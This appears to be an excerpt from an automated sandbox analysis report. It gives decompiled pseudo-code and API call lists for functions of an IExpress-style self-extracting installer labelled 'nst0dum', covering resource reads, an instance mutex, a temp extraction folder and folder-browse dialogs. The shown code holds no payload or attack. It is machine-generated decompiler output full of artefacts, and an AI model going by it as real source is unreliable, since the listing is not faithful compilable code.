                                                                                                                                                                                                    								goto L26;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x1791e4);
                                                                                                                                                                                                    							_t58 = 0x4cb;
                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags =  *0x1791e4 - 0x5c;
                                                                                                                                                                                                    						if( *0x1791e4 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                    						if(_t24 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t34 = _t20 - 1;
                                                                                                                                                                                                    					__eflags = _t34;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						EndDialog(_t64, 0);
                                                                                                                                                                                                    						 *0x179124 = 0x800704c7;
                                                                                                                                                                                                    						goto L39;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t34 != 0x834;
                                                                                                                                                                                                    					if(_t34 != 0x834) {
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t37 = LoadStringA( *0x179a3c, 0x3e8, 0x178598, 0x200);
                                                                                                                                                                                                    					__eflags = _t37;
                                                                                                                                                                                                    					if(_t37 != 0) {
                                                                                                                                                                                                    						_t38 = E00174224(_t64, _t46, _t46);
                                                                                                                                                                                                    						__eflags = _t38;
                                                                                                                                                                                                    						if(_t38 == 0) {
                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t39 = SetDlgItemTextA(_t64, 0x835, 0x1787a0);
                                                                                                                                                                                                    						__eflags = _t39;
                                                                                                                                                                                                    						if(_t39 != 0) {
                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t63 = 0x4c0;
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						E001744B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t63 = 0x4b1;
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x00173394
                                                                                                                                                                                                    0x00173396
                                                                                                                                                                                                    0x001733a4
                                                                                                                                                                                                    0x001733ab
                                                                                                                                                                                                    0x001733b6
                                                                                                                                                                                                    0x001733be
                                                                                                                                                                                                    0x001733c3
                                                                                                                                                                                                    0x001733c5
                                                                                                                                                                                                    0x00173435
                                                                                                                                                                                                    0x00173437
                                                                                                                                                                                                    0x00173437
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173437
                                                                                                                                                                                                    0x001733c7
                                                                                                                                                                                                    0x001733c9
                                                                                                                                                                                                    0x001733cc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001733cc
                                                                                                                                                                                                    0x001733ad
                                                                                                                                                                                                    0x001733b4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001733b4
                                                                                                                                                                                                    0x00173398
                                                                                                                                                                                                    0x00173399
                                                                                                                                                                                                    0x0017339b
                                                                                                                                                                                                    0x0017339c
                                                                                                                                                                                                    0x0017339d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017339d
                                                                                                                                                                                                    0x0017334c
                                                                                                                                                                                                    0x00173351
                                                                                                                                                                                                    0x00173354
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017335c
                                                                                                                                                                                                    0x00173362
                                                                                                                                                                                                    0x00173364
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173366
                                                                                                                                                                                                    0x00173367
                                                                                                                                                                                                    0x00173369
                                                                                                                                                                                                    0x0017336a
                                                                                                                                                                                                    0x0017336b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017336b
                                                                                                                                                                                                    0x0017331c
                                                                                                                                                                                                    0x00173323
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173329
                                                                                                                                                                                                    0x0017332b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017332b
                                                                                                                                                                                                    0x0017324c
                                                                                                                                                                                                    0x0017324c
                                                                                                                                                                                                    0x0017324f
                                                                                                                                                                                                    0x001732c8
                                                                                                                                                                                                    0x001732ce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001732ce
                                                                                                                                                                                                    0x00173251
                                                                                                                                                                                                    0x00173256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173271
                                                                                                                                                                                                    0x00173277
                                                                                                                                                                                                    0x00173279
                                                                                                                                                                                                    0x00173298
                                                                                                                                                                                                    0x0017329d
                                                                                                                                                                                                    0x0017329f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001732b0
                                                                                                                                                                                                    0x001732b6
                                                                                                                                                                                                    0x001732b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001732be
                                                                                                                                                                                                    0x00173280
                                                                                                                                                                                                    0x00173289
                                                                                                                                                                                                    0x0017328e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017328e
                                                                                                                                                                                                    0x0017327b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017327b
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(000003E8,00178598,00000200), ref: 00173271
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 001733E2
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 001733F7
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00173410
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000836), ref: 00173426
                                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0017342D
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0017343F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$nst0dum
                                                                                                                                                                                                    • API String ID: 2418873061-4205370855
                                                                                                                                                                                                    • Opcode ID: d83bbe9100fc464b785b0d2ce3c9246104c2138a91b805f24f4bea5bce800dbd
                                                                                                                                                                                                    • Instruction ID: 4d55210f080e0abecee1e104d8e7311acb21cbae98cbcc04f2d1010bc59e0ec9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d83bbe9100fc464b785b0d2ce3c9246104c2138a91b805f24f4bea5bce800dbd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F51473038024077FB351B355C8CF7F2A79AF96B51F90C028F66EA65C1CBA48AC1B261
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00172CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x178004; // 0x4ffa21aa
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x179a3c = __ecx;
				memset(0x179140, 0, 0x8fc);
				memset(0x178a20, 0, 0x32c);
				memset(0x1788c0, 0, 0x104);
				 *0x1793ec = 1;
				_t20 = E0017468F("TITLE", 0x179154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x17858c = _t27;
					SetEvent(_t27);
					_t64 = 0x179a34;
					if(E0017468F("EXTRACTOPT", 0x179a34, 4) != 0) {
						if(( *0x179a34 & 0x000000c0) == 0) {
							L12:
							 *0x179120 =  *0x179120 & _t65;
							if(E00175C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x178a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x178184 != 0) {
										__imp__#17();
									}
									if( *0x178a24 == 0) {
										_t57 = _t65;
										if(E001736EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x179a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x179a34 & 0x00000100) == 0 || ( *0x178a38 & 0x00000001) != 0 || E001718A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00176517(_t57, 0x7d6, _t34, E001719E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00172390(0x178a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E001744B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0017468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x178588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x179a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E001744B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E001744B9(0, 0x54b, "nst0dum", 0, 0x10, 0);
										L11:
										CloseHandle( *0x178588);
										 *0x179124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E001744B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x179124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00176CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}
                                                                                                                                                                                                    0x00172eef
                                                                                                                                                                                                    0x00172eef
                                                                                                                                                                                                    0x00172eef
                                                                                                                                                                                                    0x00172eef
                                                                                                                                                                                                    0x00172ea2
                                                                                                                                                                                                    0x00172e86
                                                                                                                                                                                                    0x00172e88
                                                                                                                                                                                                    0x00172e88
                                                                                                                                                                                                    0x00172e43
                                                                                                                                                                                                    0x00172e48
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172e48
                                                                                                                                                                                                    0x00172e30
                                                                                                                                                                                                    0x00172e30
                                                                                                                                                                                                    0x00172ef8
                                                                                                                                                                                                    0x00172f01
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172f01
                                                                                                                                                                                                    0x00172d8a
                                                                                                                                                                                                    0x00172d8f
                                                                                                                                                                                                    0x00172da1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172da3
                                                                                                                                                                                                    0x00172dae
                                                                                                                                                                                                    0x00172db4
                                                                                                                                                                                                    0x00172dbb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172dca
                                                                                                                                                                                                    0x00172dd3
                                                                                                                                                                                                    0x00172df5
                                                                                                                                                                                                    0x00172e02
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172dd5
                                                                                                                                                                                                    0x00172dde
                                                                                                                                                                                                    0x00172de3
                                                                                                                                                                                                    0x00172e04
                                                                                                                                                                                                    0x00172e0a
                                                                                                                                                                                                    0x00172e10
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172e10
                                                                                                                                                                                                    0x00172dd3
                                                                                                                                                                                                    0x00172dbb
                                                                                                                                                                                                    0x00172da1
                                                                                                                                                                                                    0x00172d5b
                                                                                                                                                                                                    0x00172d5b
                                                                                                                                                                                                    0x00172d5d
                                                                                                                                                                                                    0x00172d69
                                                                                                                                                                                                    0x00172d6e
                                                                                                                                                                                                    0x00172f06
                                                                                                                                                                                                    0x00172f06
                                                                                                                                                                                                    0x00172f06
                                                                                                                                                                                                    0x00172d59
                                                                                                                                                                                                    0x00172f18

APIs
• memset.MSVCRT ref: 00172CD9
• memset.MSVCRT ref: 00172CE9
• memset.MSVCRT ref: 00172CF9
  • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
  • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
  • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
  • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
  • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
  • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
  • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
• CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00172D34
• SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00172D40
• CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00172DAE
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00172DBD
• CloseHandle.KERNEL32(nst0dum,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00172E0A
  • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
  • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
• String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$nst0dum
• API String ID: 1002816675-1021407552
• Opcode ID: 28fa7c0b276c473cd77780ca2e91dd5e8590ff7656516ca0b2df54b8dbbdc0a4
• Instruction ID: 4149e0159278ad0ae3d3b68c2efa73041a3c82021b563890d34633c66f2f4234
• Opcode Fuzzy Hash: 28fa7c0b276c473cd77780ca2e91dd5e8590ff7656516ca0b2df54b8dbbdc0a4
• Instruction Fuzzy Hash: D851F5707803016BE724A7348D4AB7B36B8EB95710F54C039FA4DD69E1DFB888C6C621
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 81%
E001734F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
	void* _t9;
	void* _t12;
	void* _t13;
	void* _t17;
	void* _t23;
	void* _t25;
	struct HWND__* _t35;
	struct HWND__* _t38;
	void* _t39;

	_t9 = _a8 - 0x10;
	if(_t9 == 0) {
		__eflags = 1;
		L19:
		_push(0);
		 *0x1791d8 = 1;
		L20:
		_push(_a4);
		L21:
		EndDialog();
		L22:
		return 1;
	}
	_push(1);
	_pop(1);
	_t12 = _t9 - 0xf2;
	if(_t12 == 0) {
		__eflags = _a12 - 0x1b;
		if(_a12 != 0x1b) {
			goto L22;
		}
		goto L19;
	}
	_t13 = _t12 - 0xe;
	if(_t13 == 0) {
		_t35 = _a4;
		 *0x178584 = _t35;
		E001743D0(_t35, GetDesktopWindow());
		__eflags =  *0x178184; // 0x1
		if(__eflags != 0) {
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
		}
		SetWindowTextA(_t35, "nst0dum");
		_t17 = CreateThread(0, 0, E00174FE0, 0, 0, 0x178798);
		 *0x17879c = _t17;
                                                                                                                                                                                                    					__eflags = _t17;
                                                                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						E001744B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(_t35);
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t23 = _t13 - 1;
                                                                                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                                                                                    					__eflags = _a12 - 2;
                                                                                                                                                                                                    					if(_a12 != 2) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					ResetEvent( *0x17858c);
                                                                                                                                                                                                    					_t38 =  *0x178584; // 0x0
                                                                                                                                                                                                    					_t25 = E001744B9(_t38, 0x4b2, 0x171140, 0, 0x20, 4);
                                                                                                                                                                                                    					__eflags = _t25 - 6;
                                                                                                                                                                                                    					if(_t25 == 6) {
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						 *0x1791d8 = 1;
                                                                                                                                                                                                    						SetEvent( *0x17858c);
                                                                                                                                                                                                    						_t39 =  *0x17879c; // 0x0
                                                                                                                                                                                                    						E00173680(_t39);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t25 - 1;
                                                                                                                                                                                                    					if(_t25 == 1) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetEvent( *0x17858c);
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t23 == 0xe90) {
                                                                                                                                                                                                    					TerminateThread( *0x17879c, 0);
                                                                                                                                                                                                    					EndDialog(_a4, _a12);
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}
0x001734fb
0x001734fe
0x00173665
0x00173666
0x00173666
0x00173668
0x0017366e
0x0017366e
0x00173671
0x00173671
0x00173677
0x00000000
0x00173677
0x00173504
0x00173506
0x00173507
0x0017350c
0x0017365b
0x0017365f
0x00000000
0x00000000
0x00000000
0x00173661
0x00173512
0x00173515
0x001735be
0x001735c1
0x001735d1
0x001735d8
0x001735de
0x001735f8
0x00173617
0x00173617
0x00173623
0x00173637
0x0017363d
0x00173642
0x00173644
0x00000000
0x00173646
0x00173652
0x00173657
0x00173658
0x00000000
0x00173658
0x00173644
0x0017351b
0x0017351d
0x0017354f
0x00173553
0x00000000
0x00000000
0x0017355f
0x00173565
0x0017357c
0x00173581
0x00173584
0x0017359b
0x001735a1
0x001735a7
0x001735ad
0x001735b3
0x001735b8
0x00000000
0x001735b8
0x00173586
0x00173588
0x00000000
0x00000000
0x00173590
0x00000000
0x00173590
0x00173524
0x00173535
0x00173541
0x00000000
0x00173549
0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000), ref: 00173535
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00173541
                                                                                                                                                                                                    • ResetEvent.KERNEL32 ref: 0017355F
                                                                                                                                                                                                    • SetEvent.KERNEL32(00171140,00000000,00000020,00000004), ref: 00173590
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 001735C7
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 001735F1
                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 001735F8
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 00173610
                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 00173617
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00173623
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00178798), ref: 00173637
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00173671
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 2406144884-432003757
                                                                                                                                                                                                    • Opcode ID: 10b81a916eeaa5e9e8bf4ca2b0f39b2931cb982089d2308ca7d656c6dfb3c01a
                                                                                                                                                                                                    • Instruction ID: 86836bf33a4e3ca3b28c29a5bc8afabcbe0253d840a7418fd77760e10a6e6fad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b81a916eeaa5e9e8bf4ca2b0f39b2931cb982089d2308ca7d656c6dfb3c01a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D31C771284300BBD7251F25EC4DE2B3B75EBC5B11F90C525F62E95AA1CB718AC0EB51
                                                                                                                                                                                                    Uniqueness
                                                                                                                                                                                                    • Uniqueness Score: -1.00%
                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                    			E00174224(char __ecx) {
                                                                                                                                                                                                    				char* _v8;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                    				char* _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                    				char* _t61;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				char* _t65;
                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                    				char _t67;
                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                    				char _t76;
                                                                                                                                                                                                    				intOrPtr _t85;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t67 = __ecx;
                                                                                                                                                                                                    				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                    				if(_t66 == 0) {
                                                                                                                                                                                                    					_t63 = 0x4c2;
                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                    					E001744B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                    				_v12 = _t26;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                    					_t63 = 0x4c1;
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                    				_v20 = _t28;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                    				_v16 = _t29;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t76 =  *0x1788c0; // 0x0
                                                                                                                                                                                                    				if(_t76 != 0) {
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					 *0x1787a0 = 0;
                                                                                                                                                                                                    					_v52 = _t67;
                                                                                                                                                                                                    					_v48 = 0;
                                                                                                                                                                                                    					_v44 = 0;
                                                                                                                                                                                                    					_v40 = 0x178598;
                                                                                                                                                                                                    					_v36 = 1;
                                                                                                                                                                                                    					_v32 = E00174200;
                                                                                                                                                                                                    					_v28 = 0x1788c0;
                                                                                                                                                                                                    					 *0x17a288( &_v52);
                                                                                                                                                                                                    					_t32 =  *_v12();
                                                                                                                                                                                                    					if(_t71 != _t71) {
                                                                                                                                                                                                    						asm("int 0x29");
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_v12 = _t32;
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						 *0x17a288(_t32, 0x1788c0);
                                                                                                                                                                                                    						 *_v16();
                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if( *0x1788c0 != 0) {
                                                                                                                                                                                                    							E00171680(0x1787a0, 0x104, 0x1788c0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x17a288(_v12);
                                                                                                                                                                                                    						 *_v20();
                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                    					_t85 =  *0x1787a0; // 0x0
                                                                                                                                                                                                    					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					GetTempPathA(0x104, 0x1788c0);
                                                                                                                                                                                                    					_t61 = 0x1788c0;
                                                                                                                                                                                                    					_t4 =  &(_t61[1]); // 0x1788c1
                                                                                                                                                                                                    					_t65 = _t4;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t42 =  *_t61;
                                                                                                                                                                                                    						_t61 =  &(_t61[1]);
                                                                                                                                                                                                    					} while (_t42 != 0);
                                                                                                                                                                                                    					_t5 = _t61 - _t65 + 0x1788c0; // 0x2f1181
                                                                                                                                                                                                    					_t44 = CharPrevA(0x1788c0, _t5);
                                                                                                                                                                                                    					_v8 = _t44;
                                                                                                                                                                                                    					if( *_t44 == 0x5c &&  *(CharPrevA(0x1788c0, _t44)) != 0x3a) {
                                                                                                                                                                                                    						 *_v8 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
